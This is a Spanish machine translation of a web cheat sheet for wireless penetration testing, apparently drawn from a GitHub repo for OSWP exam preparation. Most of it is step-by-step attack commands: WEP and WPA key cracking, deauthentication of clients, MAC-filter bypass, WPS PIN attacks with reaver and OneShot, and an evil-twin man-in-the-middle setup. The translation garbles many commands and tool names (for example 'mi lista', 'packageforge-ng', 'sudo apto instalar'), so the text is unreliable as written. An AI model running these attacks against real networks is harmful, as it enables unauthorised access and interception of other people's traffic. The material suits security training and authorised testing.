Está en la página 1de 20

1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Pequeños negocios Recursos Libros blancos Noticias criptográficas Programación  Androide


b d 
SEO microsoft  Redes

Ciencia de los datos  Kali  linux  forense 


SQL CVE Compartir Noticias Resumir
Servicios 

Chatea con este sitio web

RECURSOS

Hoja de trucos de Pentesting


inalámbrico
Estela Sebastián S 27 de junio de 2023

ÚLTIMAS
PUBLICACIONES 
Privacidad - Condiciones

https://reconshell.com/wireless-pentesting-cheat-sheet/ 1/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Sistema
operativo
RedCloud
S
8 de julio
de 2023

Omisión
de
autentica
ción de
registro y
inicio de
sesión
social de
WordPres
s
S
30 de junio
de 2023
Este repositorio contiene una hoja de trucos para
OSWP y WiFi Cracking. Hoja de
trucos de
Kali Linux
S
Este repositorio se creó originalmente como una hoja de 21 de abril
de 2023
referencia para el examen OSWP de Offensive Security . Con el
tiempo, Offensive Security creó una segunda versión de OSWP que Preparaci
yo no he utilizado. Como a veces agrego contenidos de Pentesting ón de la
entrevist
inalámbrico que no aprendí de OSWP, y como no conozco el
a sobre
contenido más nuevo de OSWP, estoy cambiando este repositorio
ciencia de
a "WirelessPentesting-CheatSheet" en lugar de "OSWP- datos
CheatSheet". . S
12 de abril
de 2023

NOTA: La mayoría de estos ataques se probaron en un sistema


operativo Back Track 5; si está utilizando Kali Linux actualizado u
otra distribución, algunos comandos pueden tener cambios
menores.

reconocimiento

https://reconshell.com/wireless-pentesting-cheat-sheet/ 2/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Determinar el conductor usado


Para determinar si estamos usando controladores ieee80211 o
mac80211 use este comando:

Si decía "nl80211 no encontrado". eso significa que estamos


usando controladores ieee80211. De lo contrario, estamos usando
mac80211 y la salida "iw list" imprimirá la información de la tarjeta
inalámbrica.

root@wifu:~# mi lista
nl80211 no encontrado.

Mostrar SSID y su canal – controlador mac80211


Para mostrar los nombres de los puntos de acceso y su número de
canal correspondiente con los controladores mac80211, utilice la
siguiente sintaxis:

root@wifu:~# iw dev wlan0 escaneo | egrep "DS\ Parámetro\


conjunto|SSID"
SSID: wifu
Conjunto de parámetros DS: canal 3
SSID: 6F36E6
Conjunto de parámetros DS: canal 1

Mostrar SSID y su canal – controlador ieee80211


Para mostrar los nombres de los puntos de acceso y su número de
canal correspondiente con los controladores ieee80211, utilice la
siguiente sintaxis:

root@wifu:~# escaneo iwlist wlan0 | egrep "ESSID|Canal"


ESSID: "wifu"

Canal:3

https://reconshell.com/wireless-pentesting-cheat-sheet/ 3/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

ESID: "6F36E6"
Canal:11

Mostrar la dirección MAC de la tarjeta inalámbrica


Para mostrar la dirección MAC de su tarjeta inalámbrica, utilice la
siguiente sintaxis:

root@wifu:~# macchanger -s mon0


MAC actual: <dirección MAC> <(información del
dispositivo)>

Aumentar la potencia de TX
Nota: la potencia TX depende de su país

Aumentar la potencia TX de wlan0

root@wifu:~# iw reg set B0


root@wifu:~# iwconfig wlan0 <txpower>
<NmW|NdBm|apagado|auto>

Verificar cambio

raíz@wifu:~# iwconfig wlan0

Cracking Wep

WEP – Con Clientes conectados


Coloque su tarjeta inalámbrica en modo monitor en el número de 
canal del AP:
https://reconshell.com/wireless-pentesting-cheat-sheet/ 4/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

airmon-ng start <interfaz> <canal AP>

Inicie un filtrado de captura Airodump-ng en el canal AP y BSSID,


guardando el archivo en el disco:

airodump-ng -c <Canal AP> --bssid <MAC AP> -w <captura>


<interfaz>

Realizar un ataque de autenticación falso contra el AP:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Tu MAC>


<interfaz>

Inicie el ataque de reproducción de solicitud ARP:

aireplay-ng -3 -b <AP MAC> -h <Tu MAC> <interfaz>

Anule la autenticación del cliente conectado para forzar una nueva


generación de IV por parte del AP:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Una vez que se haya capturado una cantidad significativa de IV,


ejecute Aircrack-ng contra la captura de Airodump:

aircrack-ng <captura>

https://reconshell.com/wireless-pentesting-cheat-sheet/ 5/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

WEP – A través de un cliente


Coloque su tarjeta inalámbrica en modo monitor en el canal AP:

airmon-ng start <interfaz> <canal AP>

Inicie un volcado de captura, filtrando por canal AP y BSSID,


guardando la captura en un archivo:

airodump-ng -c <canal AP> --bssid <AP MAC> -w <captura>


<interfaz>

A continuación, realice una autenticación falsa en el punto de


acceso:

aireplay-ng -0 1 -e <ESSID> -a <AP MAC> -w <captura>


<interfaz>

Inicie el ataque de reproducción interactiva de paquetes buscando


paquetes ARP provenientes del AP:

aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -f 1 -m


68 -n 86 <interfaz>

Una vez que se hayan capturado suficientes IV, descifre la clave


WEP:

aircrack-ng -z <captura>


WEP – Sin cliente
https://reconshell.com/wireless-pentesting-cheat-sheet/ 6/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Coloque su tarjeta inalámbrica en modo monitor en el número de


canal del AP:

airmon-ng start <interfaz> <canal AP>

Realizar un ataque de autenticación falso contra el AP:

aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Tu MAC>


<interfaz>

Ejecute el ataque 4, el ataque chopchop de KoreK (o el ataque 5, el


ataque de fragmentación):

Ataque KoreK Chop Chop

aireplay-ng -4 -b <AP MAC> -h <Tu MAC> <interfaz>

Ataque de fragmentación

aireplay-ng -5 -b <AP MAC> -h <Tu MAC> <interfaz>

Cree un paquete de solicitud ARP usando paqueteforge-ng:

packageforge-ng -0 -a <AP MAC> -h <Su MAC> -l <IP de


origen> -k <IP de destino> -y <nombre de archivo xor> -w
<nombre de archivo de salida>

Inyecte el paquete en la red mediante el ataque 2, el ataque de


reproducción interactiva de paquetes:

https://reconshell.com/wireless-pentesting-cheat-sheet/ 7/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

aireplay-ng -2 -r <nombre de archivo del paquete>


<interfaz>

Crackea la clave WEP usando Aircrack-ng:

aircrack-ng <captura>

WEP: omitir la autenticación de clave compartida


Coloque su tarjeta inalámbrica en modo monitor en el número de
canal del AP:

airmon-ng start <interfaz> <canal AP>

Iniciar una captura Airodump-ng, filtrando por canal AP y BSSID,


guardando la captura:

airodump-ng -c <canal AP> --bssid <AP MAC> -w <captura>


<interfaz>

Anule la autenticación del cliente conectado para capturar el flujo


de claves PRGA XOR:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Realice una autenticación de clave compartida falsa utilizando el


flujo de claves XOR:

https://reconshell.com/wireless-pentesting-cheat-sheet/ 8/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

aireplay-ng -1 0 -e <ESSID> -y <keystreamfile> -a <AP


MAC> -h <Su MAC> <interfaz>

Inicie el ataque de reproducción de solicitud ARP:

aireplay-ng -3 -b <AP MAC> -h <Tu MAC> <interfaz>

Vuelva a autenticar al cliente víctima para forzar la generación de


un paquete ARP:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Una vez que el AP genere los IV, ejecute Aircrack-ng contra la


captura:

aircrack-ng <captura>

Solución de problemas
Durante un ataque de omisión de autenticación de clave
compartida, si una vez que anula la autenticación de un cliente,
aparece un mensaje "SKA roto" en lugar del "flujo de claves de 140
bytes:" en su salida de Airodump. Intente reiniciar la captura de
Airodump-ng y desautenticar a otro cliente.

Descifrando WPA/WPA2 PSK

WPA – Grieta
Comience colocando su tarjeta inalámbrica en modo monitor en el 
número de canal del AP:
https://reconshell.com/wireless-pentesting-cheat-sheet/ 9/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

airmon-ng start <interfaz> <canal AP>

Inicie una captura de Airodump, filtrando por el canal AP y BSSID,


guardando la captura en el disco:

airodump-ng -c <canal AP> --bssid <AP MAC> -w <captura>


<interfaz>

Anule la autenticación de un cliente conectado para obligarlo a


completar el protocolo de enlace de 4 vías:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Descifra la contraseña WPA con Aircrack-ng:

aircrack-ng -w <lista de palabras> <captura>

Alternativamente, si tiene una base de datos Airolib-ng, puede


pasarla a Aircrack:

aircrack-ng -r <nombre de base de datos> <captura>

Aircrack-ng y John el Destripador


Coloque su tarjeta inalámbrica en modo monitor en el número de
canal del AP:

airmon-ng start <interfaz> <canal AP>


https://reconshell.com/wireless-pentesting-cheat-sheet/ 10/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Inicie una captura de Airodump, filtrando por el canal AP y BSSID,


guardando la captura en el disco:

airodump-ng -c <canal AP> --bssid <AP MAC> -w <captura>


<interfaz>

Obligue a un cliente a volver a conectarse y completar el protocolo


de enlace de 4 vías ejecutando un ataque de desautenticación en
su contra:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Una vez que se haya capturado un apretón de manos, cambie al


directorio de John the Ripper e ingrese las palabras destrozadas en
Aircrack-ng para obtener la contraseña WPA:

./john --wordlist=<lista de palabras> --rules --stdout |


aircrack-ng -e <ESSID> -w - <captura>

cowpatty
Coloque su tarjeta inalámbrica en modo monitor en el número de
canal del AP:

airmon-ng start <interfaz> <canal AP>

Inicie una captura de Airodump, filtrando por el canal AP y BSSID,


guardando el archivo en el disco:

airodump-ng -c <canal AP> --bssid <AP MAC> -w <captura> 

https://reconshell.com/wireless-pentesting-cheat-sheet/ 11/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

<interfaz>

Anule la autenticación de un cliente conectado para obligarlo a


completar el protocolo de enlace de 4 vías:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Para descifrar la contraseña WPA con coWPAtty en modo de lista


de palabras:

cowpatty -r <captura> -f <lista de palabras> -2 -s


<ESSID>

Para usar el modo de tabla arcoíris con coWPAtty, primero genera


los hashes:

genpmk -f <lista de palabras> -d <nombre de archivo


hashes> -s <ESSID>

Ejecute coWPAtty con los hashes generados para recuperar la


contraseña WPA:

cowpatty -r <captura> -d <nombre de archivo hashes> -2 -s


<ESSID>

pirita
Coloque su tarjeta inalámbrica en modo monitor en el número de
canal del AP:

https://reconshell.com/wireless-pentesting-cheat-sheet/ 12/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

airmon-ng start <interfaz> <canal AP>

Utilice Pyrit para olfatear la interfaz del modo monitor y guardar la


captura en un archivo:

pyrit -r <interfaz> -o <captura> stripLive

Anule la autenticación de un cliente conectado para obligarlo a


completar el protocolo de enlace de 4 vías:

aireplay-ng -0 1 -a <AP MAC> -c <Cliente MAC> <interfaz>

Ejecute Pyrit en modo diccionario para descifrar la contraseña


WPA:

pyrit -r <captura> -i <lista de palabras> -b <AP MAC>


ataque_paso

Para usar Pyrit en modo de base de datos, comience importando


su lista de palabras:

pyrit -i <lista de palabras> importar_contraseñas

Agregue el ESSID del punto de acceso a la base de datos de Pyrit:

pirit -e <ESSID> crear_essid

https://reconshell.com/wireless-pentesting-cheat-sheet/ 13/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Genere los PMK para el ESSID:

pyrit -r <captura> -b <AP MAC> ataque_db

Encuentra SSID oculto

Configure su tarjeta inalámbrica en modo monitor.

sudo airmon-ng start <tarjeta inalámbrica>

Monitorear el punto de acceso.

sudo airodump-ng <tarjeta inalámbrica de monitor>

Detecte el BSSID del ESSID oculto al que se dirige, vuelva a ejecutar


el escaneo especificando ese BSSID y el canal.

sudo airodump-ng -c <canal> --bssid <bssid> <tarjeta


inalámbrica del monitor>

Ahora puedes desactivar un dispositivo.

sudo aireplay-ng -0 15 -c <bssid del cliente> -a <bssid


del punto de acceso> <tarjeta inalámbrica del monitor>

Omitir el filtrado MAC


https://reconshell.com/wireless-pentesting-cheat-sheet/ 14/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Configure su tarjeta inalámbrica en modo monitor.

sudo airmon-ng start <tarjeta inalámbrica>

Monitorear el punto de acceso.

airodump-ng -c <canal> --bssid <bssid> -w <archivo de


salida> <tarjeta inalámbrica del monitor>

Desautenticar a un cliente y recordar su dirección MAC.

aireplay-ng -0 0 -a <BSSID> -c <Cliente> <tarjeta


inalámbrica del monitor>

Apague la interfaz de su monitor.

ifconfig <monitor tarjeta inalámbrica> abajo

Atribuya la dirección MAC del cliente a su tarjeta inalámbrica.

macchanger --mac <dirección MAC del cliente desactivado>


<tarjeta inalámbrica de monitor>

Enciende tu tarjeta inalámbrica.

ifconfig <tarjeta inalámbrica de monitor>

https://reconshell.com/wireless-pentesting-cheat-sheet/ 15/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Inicie su ataque utilizando la dirección MAC robada. Solicitud de


reproducción ARP en este caso.

aireplay-ng -3 -b <bssid> -h <dirección MAC robada>


<tarjeta inalámbrica del monitor>

Ataques WPS

Reaver – Ataques WPS


Ataque de polvo de duendecillo

Instalar atracador

sudo apt-get instalar reaver

Configurar la tarjeta inalámbrica en modo monitor

sudo airmon-ng start <tarjeta inalámbrica>

Enumerar punto inalámbrico mediante lavado

wash -i <tarjeta inalámbrica del monitor>

Ejecutar ataque de polvo de hadas

reaver -i <tarjeta inalámbrica de monitor> -b <bssid> -vv


-K 1

https://reconshell.com/wireless-pentesting-cheat-sheet/ 16/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Ataque de pin específico

Nota: El parámetro -S se usa para usar teclas DH pequeñas para


mejorar la velocidad de crack.

reaver -i <tarjeta inalámbrica del monitor> -b <bssid> -


vv -p <Código Pin> -S

Objetivo de 5 GHz

Nota: Apunte a 5 GHz con el parámetro “-5”. Ejemplo usando Pixie


Dust Attack a continuación.

reaver -i <tarjeta inalámbrica de monitor> -b <bssid> -5


-vv -K 1

Bully – Ataques WPS


OneShot: ataques WPS sin el modo monitor habilitado
Instalación

Consulte https://github.com/drygdryg/OneShot si es necesario.

sudo apt install -y python3 wpasupplicant iw wget


sudo apto instalar -y pixiewps
discos compactos ~
mkdir oneshot && cd oneshot
wget
https://raw.githubusercontent.com/drygdryg/OneShot/master/one
wget
https://raw.githubusercontent.com/drygdryg/OneShot/master/vul

Ataque de polvo de duendecillo


https://reconshell.com/wireless-pentesting-cheat-sheet/ 17/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

python3 oneshot.py -b <bssid> wlan0 -K

Pixie Force Attack con retraso de 5 segundos por cada intento

python3 oneshot.py -b <bssid> wlan0 -F -d 5

Fuerza bruta en línea

python3 oneshot.py -b <bssid> wlan0 -b

Pin personalizado

python3 oneshot.py -b <bssid> wlan0 -p 12345678

Usando el botón WPS

python3 oneshot.py -b <bssid> wlan0 --pbc

El hombre en el medio del ataque

Primero instale las dependencias.

apt-get instalar bridge-utils

Inicie su tarjeta inalámbrica en modo monitor

airmon-ng iniciar wlan0


https://reconshell.com/wireless-pentesting-cheat-sheet/ 18/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

Configure la tarjeta inalámbrica como punto de acceso utilizando


el BSSID que desee.

airbase-ng –e “<BSSID deseado>” <tarjeta inalámbrica del


monitor>

Configurar el puente

brctl addbr <NombrePuente>


brctl addif <NombrePuente> <tarjeta inalámbrica del
monitor>

Enciende tu conexión a Internet y el nombre de tu puente

ifconfig eth0 0.0.0.0 arriba


ifconfig <NombrePuente> arriba

Configurar cliente dh

dhclient3 <NombrePuente>

Desautentica a tu objetivo.

aireplay-ng –deauth 0 –a <victimBSSID> wlan0mon

Espere a que su objetivo se conecte a su punto de acceso falso. De


lo contrario, repita la desautenticación hasta que sea exitosa.


Luego, utilizando Wirehark, analice el tráfico de su objetivo.

https://reconshell.com/wireless-pentesting-cheat-sheet/ 19/23
1/11/24, 1:20 AM Hoja de referencia de pentesting inalámbrico: herramientas de pruebas de penetración, tutoriales de ML y Linux

# Filtro:
# ;seleccione la interfaz <Nombre del puente>

Conduciendo

Usando WiGLE
Puede navegar por el sitio web de WiGLE para ver su perfil y más.

Descargar elWiGLE APK

Ábrelo en tu teléfono, ejecuta el escaneo y conduce.

Usando Pwnagtochi
Pwnagotchi se ejecuta en Raspberry Pi y le permite realizar varios
ataques inalámbricos, pero específicamente contra WPA.

Usando complementos, puedes enviar apretones de manos en


línea e intentar descifrarlos.

Este complemento le permite guardar la coordinación como la


conducción.


Wireless Pentesting es un repositorio de github de V0lk3n

Fuente de Hoja de trucos de Kali Linux

https://reconshell.com/wireless-pentesting-cheat-sheet/ 20/23

También podría gustarte